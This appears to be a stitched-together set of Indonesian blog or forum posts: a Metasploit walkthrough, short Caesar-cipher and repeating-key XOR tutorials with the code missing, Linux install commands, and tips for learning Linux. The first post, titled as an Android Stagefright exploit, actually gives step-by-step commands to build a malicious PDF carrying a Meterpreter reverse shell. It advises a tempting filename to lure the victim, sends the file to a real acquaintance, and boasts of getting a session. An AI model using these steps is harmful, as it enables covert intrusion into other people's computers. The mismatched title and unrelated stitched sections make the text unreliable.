Mungkin beberapa dari kita sudah paham mengenai virus, tapi banyak juga yang belom dengan virus apalagi mengalami sebuah device terkena virus.
Disini saya akan memperlihatkan bagaiman sebuah virus yang berjenis worm melakukan keunggulannya menggunakan sebuah OS (Operating System) Linux. Biasanya untuk menyangkut hal ini OS Linux yang sering digunakan adalah Backtrack, Kali Linux, dll yang berhubungan dengan keamanan sebuah jaringan internet.
Tidak bisa di pungkiri lagi di zaman sekarang internet sudah menguasi hampir 99,99% dunia, tapi dengan adanya manusia menggunakan internet banyak yang menimbulkan hal positif dan negatif. Untuk perbedaan keduanya kalian tidak perlu diterangkan kembali karena sudah pada paham.
Jadi kalian bisa melihat tutorial cara menggunakan Exploit Android Stagefright (Fixed By fireworm) berbahasa Phyton (.py) lewat OS Linux.
Jika ada yang ingin mencoba kalian bisa mendownload di link dibawah ini
Silahkan pelajari lewat tayangan youtube ini :
Windows or Linux OS(I'm using Kali Linux in this tutorial) Framework
Berikut ini tahap-tahapannya :
Buka terminal anda dan ketikan ini:
service postgresql start service metasploit start msfconsole
setelah terbuka metasploit anda ketikan ini:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs set payload windows/meterpreter/reverse_tcp set filename tugas.pdf set lhost 192.168.1.100 set lport 443 exploit
Keterangan:
use exploit Use adobe pdf embedded exe exploit
set payload window set the payload to return meterpreter script when exploit successfully performed
set filename tugas.pdf --> Membuat file ini semenarik Anda sehingga korban akan membuka PDF berbahaya Anda.
set lhost 192.168.1.100 --> Ip Anda
set lport 443 --> Saya menggunakan port ini (443 selalu terbuka: p)
exploit --> menghasilkan PDF berbahaya
Setelah berhasil menghasilkan PDF, itu akan disimpan di komputer lokal Anda buka folder home CTRL+H /root/.msf4/local/(nama pdf)
Langkah selanjutnya adalah mengirimkan pdf kita untuk menargetkan ke korban, terserah mau pakai teknik apa jg bro yang penting file pdf sampai dikomputer korban. Dalam hal ini saya akan kirimkan ke teman saya ma*******@gmail.com kebetulan teman ane masih pakai wedus XP.
setelah file kita berada di pc korban tinggal ketikan ini di terminal:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lport 443 set lhost 192.168.1.100 (ip anda) exploit
dan gotcha ane dapet sessionnya setelah teman ane membuka pdfnya.
Pada kesempatan kali ini, kita akan belajar Kriptografi dari nol. Tujuannya untuk meramaikan forum ini, sekaligus menjadi bahan belajar bagi kawan-kawan yang ingin mempelajari kriptografi lebih mendalam.
Melihat film-film seperti 'The Imitation Game' membuat banyak orang ingin belajar kriptografi. Namun sebenarnya untuk mencapai tersebut tidaklah mudah, perlu banyak latihan alias ngulik. Kriptografi sendiri merupakan topik yang paling abstrak di dunia IT Security, karena kita akan berhadapan dengan notasi matematika yang sangat rumit dan susah untuk dijelaskan. Apalagi teknik kriptanalisis yang membutuhkan infrastruktur besar seperti GPU Cluster Server menjadi hal yang membutuhkan banyak biaya.
Walaupun begitu, semua hal bisa dipelajari yang penting ada niat, ikhtiar dan doa. Oke mulai saja ya, sebenarnya kriptografi jika tidak memahami enkripsi sederhana, akan membuat kita bingung setengah mati dalam memahami enkripsi kriptografi modern seperti RSA, ECDSA, ECC, GCM, CBC, SHA3 dan lain-lain. Dan yang lebih sulit lagi adalah memahami implementasinya seperti OpenSSL.
Oleh karena itu, mari mulai dengan yang paling klasik yakni Caesar Cipher. Enkripsi Caesar cipher sangatlah sederhana. Didalamnya kita tinggal menggeser (shift) abjad yang diinginkan.
plainteks: Ini pesan yang sangat rahasia.
cipherteks: LQL SHVDQ BDQJ VDQJDW UDKDVLD.
Lihat plainteks dan cipherteks! Pada enkripsi tersebut huruf I digeser 3 kali ke kanan sehingga menghasilkan huruf L. Artinya kunci enkripsinya adalah 3.
Untuk praktiknya, coba tulis dan kompilasi koding dibawah ini:
Mengapa tidak menggunakan tag <code>, agar copy paste koding mudah? Salah satu alasanya agar membiasakan koding sehingga mereduksi rusaknya tombol ctrl+c dan ctrl+v (hehe).
Kemudian kompilasi dengan perintah python caesar.py
Tulisan kali ini akan membahas mengenai Implementasi Repeating Key XOR. Enkripsi ini menggunakan kunci yang berulang-ulang dalam satu proses enkripsi. Fungsinya mirip dengan Vigenere Cipher.
Repeating Key XOR
Atur plainteks yang ingin dienkripsi, misal "Tapi jangan bilang mama, Aku takut nanti dia bisa marah-marah. Kalau tahu aku ini Boy Band"
Atur kunci yang ingin digunakan, misal "TIPEX"
Nah, setelah mengatur plainteks dan kunci yang diinginkan. Coba koding ulang, Implementasi Repeating Key XOR dibawah ini:
Hasil kompilasi:
Notasinya masih sama dengan tulisan sebelumnya.
Penutup
Program tersebut menggunakan modul Crypto, dengan fungsi strxor untuk memudahkan proses XOR antar tipe data string. Itulah sekilas Implementasi Repeating Key XOR, Selamat Mencoba.
3. ANTIVIRUS
Kalo menurut gue sih buat apa linux pake antivirus?
tapi kalo yg mau pasang ada nih.
ClamAV Code: sudo apt-get install clamav clamtk
Avast for linux Code: wget http://files.avast.com/files/linux/avast...2_i386.deb && sudo dpkg -i avast4workstation_1.3.0-2_i386.deb
Install dan Atur Compiz Fusion untuk yg pake KDE berbangga lah soalnya kita bisa design desktop kompi kita lebih keren dan juara daripada si jendela Code: sudo apt-get install compiz
untuk mengatur compiz nya install ini Code: sudo apt-get install simple-ccsm
4. DOWNLOAD MANAGER
Gak kalah dong linux juga punya download manager kaya IDM sama Orbit gitu cuman beda dikit doang.
note: kalo buat KDE gak salah udah terintegrasi kok
Nero 3 (sekarang udah update jauh) Code: Download installation file from http://www.ziddu.com/download/5755618/nerolinux-3.5.3.1-x86.zip.html For rpm package refers to http://www.nero.com/ena/downloads-linux3-trial.php Extract the downloaded file. It will produce a file named nerolinux-3.5.3.1-x86.deb sudo dpkg -i nerolinux-3.5.3.1-x86.deb
NOTE : Sebelum nya saya mau menegaskan kalau ini murni sharing pengalaman pribadi aja. Mungkin kita berbeda pendapat, tapi inilah yg saya lakukan selama belajar Linux... this is my way
Kali ini bukan tutor, tapi tips ringan. Ini murni dari pengalaman saya belajar Linux walau belom terlalu ahli, saya mau coba berbagi pengalaman aja semoga bermanfaat khusus nya buat newbie yang mau belajar Linux.
Gak perlu pake intro segala lah, soalnya saya yakin temen2 di sini pasti udah tau Linux itu apa, hanya mungkin tidak tau bagaimana cara "bersahabat" dengan OS yg satu ini. Oke langsung aja....
1. Install Linux ke Harddisk!
Ini hal pertama yang harus kamu lakukan. Bagaimana kamu bisa belajar Linux kalau tidak menginstall nya... kan ada Live CD? knp harus di install ke HDD? nah, ini dia cara belajar yang menurut saya kurang tepat (bukan salah loh yah, hanya kurang tepat). Alasan nya ada 2 :
1.1 Alasan Teknis
CD/DVD Room itu lambat. Jadi kalau kamu lagi asik" belajar linux, terus tiba2 jadi lemot jangan salahkan Linux nya... tapi salahkan diri kamu sendiri kenapa menggunakan Live CD. Live CD sendiri fungsi nya hanyalah untuk mencoba, bukan di gunakan utk mempelajari... cateett...
1.2 Alasan Psikis
Semua orang yang belajar Linux pasti pernah frustasi (trust me). Master sekalipun pasti pernah frustasi jg saat menggunakan Linux. Nah, kalau kamu tidak menginstall linux ke HDD, apa yang kamu lakukan saat sedang frustasi saat belajar Linux? hmmm... coba saya tebak. Kalau tidak di masukan ke gudang, pasti live CD nya di jadikan ganjelan pintu... trus balik lg deh ke windows...
Hal ini memang terkesan sepele, tapi percaya atau tidak kebiasaan yang seperti ini sudah menjamur pada bangsa kita.... Oleh karena itu, paksakan saja! walaupun frustasi tapi itulah jalan yang harus kamu tempuh jika ingin benar2 mengenal Linux luar dan dalam.
2. Cukup Linux untuk mesin kamu!
Budayakan Singel Boot hanya untuk Linux. Karena apa? ini masih berkaitan dengan poin pertama alasan psikis, tapi ini lebih keras lagi bro!. Dengan hanya ada Linux di laptop/PC kamu, kamu tidak akan bisa lari dari masalah. Kamu harus menghadapi dan menyelesaikan masalah itu. Inilah essensi dari Linux yg sebenarnya... Kalau kamu dual boot dng Windogs, saat kamu frustasi dng Linux kamu pasti langsung balik ke windogs, Trust me... saya sendiri waktu pertama menginstall Linux ke Laptop saya, saya nekat menghapus windows di laptop saya... padahal waktu itu saya masih buta Linux, tapi saya merasakan maanfaat nya!
3. Trial and Error itu baik.
Trial and error adalah bagian penting dalam pembelajaran Linux, kalau di terjemahkan mungkin artinya Mencoba dan Gagal... Jangan takut untuk mencoba hal" baru di dunia Linux, dan jg jangan takut gagal. Misal, kamu bisa mulai dengan multimedia. Bagaimana cara install mp3, video dll... lalu bisa di lanjutkan dengan networking, dan seterus nya hingga level server. Dalam melalui semua itu, kamu pasti akan mengalami trial and error, but jangan menyerah... teruslah belajar, karena dari trial and error ini kamu akan semakin pintar.
4. Aktif lah dalam komunitas!
Tidak ada orang yang bisa belajar Linux sendiri. Kalau ada yang ngomong dia belajar Linux secara otodidak, it's totaly nonsense. Nah, kalau kamu menghadapi kesulitan saat belajar, jangan sungkan untuk bertanya pada komunitas nya. Misal Debian, kamu bisa bertanya di forums.debian.net. Mereka akan bergotong royong untuk membantu kamu. Dukungan komunitas linux sangat kuat, sehingga kamu tidak akan di tinggalkan jika ada masalah. Memang bahasa cukup menjadi kendala, tapi kan sudah ada Google Translate? yah itung" sambil belajar bhs Inggris lah ya... hehe...
5. Gunakan lah distribusi yang susah!
Wew! tips ini memang cukup radikal, karna dimana-mana orang pasti menyuruh "gunakan dulu ubuntu, mint, mandriva, atau apa aja yg enteng..." Oh c'mon man... lalu apa beda nya dengan windows kalau begitu? saya no-offence loh yah buat penggemar ubuntu dan turunan nya, sekali lagi ini murni pendapat saya pribadi. Menurut saya memulai dengan distro yang terlampau mudah itu tidak berdampak banyak pada kemajuan ilmu Linux kamu, yang ada kamu malah terlena sehingga lupa untuk belajar. Kenapa? silahkan baca lagi poin 3 (Trial n Error), kalau terlalu mudah dan hampir tidak menemukan kesulitan, lalu dimana proses belajar nya?
Contoh kasus : kamu mau menggunakan modem, di Ubuntu semua itu tinggal plug n' play, pasang langsung jalan. Nah, lantas di mana trial n' error nya? sekali lagi, di mana proses belajar nya?
Cobalah distribusi yg punya tingkat kesulitan menengah ke atas, misal Debian, CentOS, RedHat, Slackware. Sampai yang sulit seperti Gentoo, Arch Linux dan FreeBSD (UNIX). Memang sulit, tapi ibarat kata, orang lain masih belajar penjumblahan, kamu sudah bermain-main dengan perkalian... ;)